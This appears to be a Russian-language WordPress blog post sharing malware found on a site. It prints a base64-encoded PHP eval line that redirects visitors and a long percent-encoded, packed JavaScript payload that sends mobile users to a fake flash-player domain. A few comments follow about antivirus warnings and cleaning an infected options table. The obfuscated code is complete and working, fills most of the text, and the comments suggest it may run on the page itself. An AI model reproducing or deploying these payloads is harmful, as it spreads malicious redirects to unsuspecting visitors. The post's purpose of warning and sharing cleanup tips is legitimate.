<!--?php <br ?--> eval(base64_decode('JHgwYj0iaGVhXDE0NFx4NjVyIjsgDQokeDBiKCJSZVx4NjZceDcyZVx4NzNceDY4XHgzYSAyXHgzNVwwNzNceDIwdVwxNjJceDZjXHgzZFwiXHg2OFx4NzRceDc0XHg3MFwwNzJcMDU3L1wxNjdcMTY3XDE2N1wwNTZmXDE1N3JceDYyXDE1MWRceDY0XHg2NW56XDA1NmlceDZlXDE0NlwxNTdceDJmaFx4NmZcMTU1XHg2NVx4N2FcIiIpOw=='));
ява скрипты

Не помню, что вирус делал, но он был в js яваскрипте

;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6E%65%77%62%65%73%74%66%6C%61%73%68%70%6C%61%79%65%72%2E%72%75%2F%6C%3D%33%32%34%31%31%38%31%38%30%37%36%61%31%61%30%61%35%66%30%61%35%30%35%34%31%63%31%65%30%32%34%66%36%37%31%64%35%63%35%65%35%38%36%35%31%64%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E"));

Понравилась запись? Поделись!

  • Dima

    спасибо за предупреждение, если вы заходили на эту страницу про вирусы, то скорей всего размещенный код на странице вызвал предупреждение. Счс проверил на http://fotohelp.kz/s/7z и вроде чисто.

  • ikarus

    Кажется ваш сайт опять заражен, Avast не дал зайти на ваш сайт до тех пор пока я его не вырубил, Соолбщение что то вроде: JS:Agent-BVF [Trj]

  • http://fotohelp.kz/jexr/aHR0cDovL25vZHdzLmNvbS8= Nodws

    Maybe you did, I did not find a «social.png», so maybe it’s a different version

  • http://fotohelp.kz/ Дмитрий — fotohelp.kz

    thank you, look for table «1» in mysql, but did not find it, maybe I delete it earlier

  • http://fotohelp.kz/jexr/aHR0cDovL25vZHdzLmNvbS8= Nodws

    had this son of a bitch on the WP_OPTIONS table named «1» with value «data:{blahblahblahspam}»

    delete that column and all «shady» plugins

Protected by Copyscape DMCA Copyright Search
WordPress: 62.35MB | MySQL:101 | 0,576sec